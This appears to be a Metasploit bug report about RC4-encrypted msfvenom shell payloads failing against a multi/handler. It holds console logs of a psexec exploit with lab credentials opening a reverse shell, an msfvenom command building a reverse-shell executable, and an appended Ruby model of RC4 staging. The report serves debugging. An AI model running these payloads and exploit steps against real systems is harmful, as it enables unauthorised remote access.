Open
Description
It appears that RC4-encrypted shell payloads built with msfvenom are incompatible with RC4-encrypted handlers in the framework. Automated testing suggests this affects both staged and stageless x86 and x64 Windows shell payloads. (Unsure whether this is also a Mettle problem.)
This is not the case with RC4-encrypted payloads generated by the framework for use in exploits; those appear to work. The failure occurs only when the payload is built with msfvenom and calls back to a multi/handler.
Meterpreter sessions do not appear to be affected.
Works fine as part of an exploit:
msf5 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.134.164 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass vagrant no The password for the specified username
SMBUser vagrant no The username to authenticate as
Payload options (windows/x64/shell/reverse_tcp_rc4):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.168 yes The listen address (an interface may be specified)
LPORT 4567 yes The listen port
RC4PASSWORD msf yes Password to derive RC4 key from
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/psexec) > set rc4password secret
rc4password => secret
msf5 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.135.168:4567
[*] 192.168.134.164:445 - Connecting to the server...
[*] 192.168.134.164:445 - Authenticating to 192.168.134.164:445 as user 'vagrant'...
[!] 192.168.134.164:445 - No active DB -- Credential data will not be saved!
[*] 192.168.134.164:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.134.164:445 - PowerShell found
[*] 192.168.134.164:445 - Selecting PowerShell target
[*] 192.168.134.164:445 - Powershell command length: 2788
[*] 192.168.134.164:445 - Executing the payload...
[*] 192.168.134.164:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.164[\svcctl] ...
[*] 192.168.134.164:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.164[\svcctl] ...
[*] 192.168.134.164:445 - Obtaining a service manager handle...
[*] 192.168.134.164:445 - Creating the service...
[+] 192.168.134.164:445 - Successfully created the service
[*] 192.168.134.164:445 - Starting the service...
[*] Sending stage (340 bytes) to 192.168.134.164
[+] 192.168.134.164:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.134.164:445 - Removing the service...
[+] 192.168.134.164:445 - Successfully removed the service
[*] 192.168.134.164:445 - Closing service handle...
[*] Command shell session 1 opened (192.168.135.168:4567 -> 192.168.134.164:49945) at 2019-10-30 06:38:03 -0500
ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : moose
IPv6 Address. . . . . . . . . . . : fd34:fe56:7891:2f3b:4cd1:ef19:f75f:fe57
IPv6 Address. . . . . . . . . . . : fd34:fe56:7891:2f3b:ffff:defb:a366:5d3
Temporary IPv6 Address. . . . . . : fd34:fe56:7891:2f3b:38f0:fd27:85f1:52ab
Link-local IPv6 Address . . . . . : fe80::4cd1:ef19:f75f:fe57%4
IPv4 Address. . . . . . . . . . . : 192.168.134.164
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::21b:21ff:fe36:e9b5%4
192.168.134.254
C:\Windows\system32>exit
exit
Fails when using msfvenom:
tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p windows/shell/reverse_tcp_rc4 -f exe -o winshellrc4.exe RC4PASSWORD=secret LHOST=192.168.135.168 LPORT=4567
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 458 bytes
Final size of exe file: 73802 bytes
Saved as: winshellrc4.exe
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp_rc4
payload => windows/shell/reverse_tcp_rc4
msf5 exploit(multi/handler) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(multi/handler) > set lport 4567
lport => 4567
msf5 exploit(multi/handler) > set rc4password secret
rc4password => secret
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.135.168:4567
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (271 bytes) to 192.168.134.164
[*] Command shell session 2 opened (192.168.135.168:4567 -> 192.168.134.164:51479) at 2019-10-30 06:49:00 -0500
ipconfig
ipconfig
^C
I'm on commit b7acbfe.
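To show why a stage that is transformed after the handler encrypts it (the handler above reports "Encoded stage with x86/shikata_ga_nai" only in the failing run) can never be decrypted correctly by the stager, here is a small Ruby model of the RC4 staging exchange. This is an added example, not code from this issue or from the framework; the key schedule (SHA-1 of RC4PASSWORD, first 4 bytes XOR the length prefix, next 16 bytes as the RC4 key) and the length-prefix framing are my reading of the reverse_tcp_rc4 stager and should be checked against the framework source. The encoder stand-in is a constructed byte rewrite, not shikata_ga_nai.

```ruby
require 'digest'

# Key schedule as I read the reverse_tcp_rc4 stager (assumption, not from
# this issue): SHA-1 of RC4PASSWORD; bytes 0..3 XOR the length prefix,
# bytes 4..19 are the RC4 key.
def rc4_keys(password)
  key = Digest::SHA1.digest(password)
  [key[0, 4], key[4, 16]]
end

# Plain RC4 keystream XOR; the same routine encrypts and decrypts.
def rc4(key, data)
  s = (0..255).to_a
  j = 0
  256.times do |i|
    j = (j + s[i] + key.getbyte(i % key.bytesize)) & 0xff
    s[i], s[j] = s[j], s[i]
  end
  i = j = 0
  data.bytes.map do |b|
    i = (i + 1) & 0xff
    j = (j + s[i]) & 0xff
    s[i], s[j] = s[j], s[i]
    b ^ s[(s[i] + s[j]) & 0xff]
  end.pack('C*')
end

# Handler side: XORed little-endian length prefix, then the RC4-encrypted stage.
def frame_stage(password, stage)
  xorkey, rc4key = rc4_keys(password)
  prefix = [stage.bytesize ^ xorkey.unpack1('V')].pack('V')
  prefix + rc4(rc4key, stage)
end

# Stager side: recover the length, decrypt, and check the stage came through intact.
def unframe_stage(password, wire, expected)
  xorkey, rc4key = rc4_keys(password)
  len = wire[0, 4].unpack1('V') ^ xorkey.unpack1('V')
  body = wire[4, len] || ''
  rc4(rc4key, body) == expected
end

# Constructed stand-in stage (not a real payload) and a constructed "encoder"
# that rewrites bytes after encryption, which is all a stream cipher needs
# to turn the decrypted stage into garbage.
STAGE = "\x31\xc0\x50\x68\x63\x6d\x64\x00".b * 8
def encode_after_encryption(wire)
  wire[0, 4] + wire[4..-1].bytes.map { |b| (b + 1) & 0xff }.pack('C*')
end
```

Mismatched passwords on the two sides fail the same way, so a silent session like the one above is consistent with either a password mismatch or a post-encryption transform; comparing the byte count the handler reports with what the stager expects is the quickest triage step.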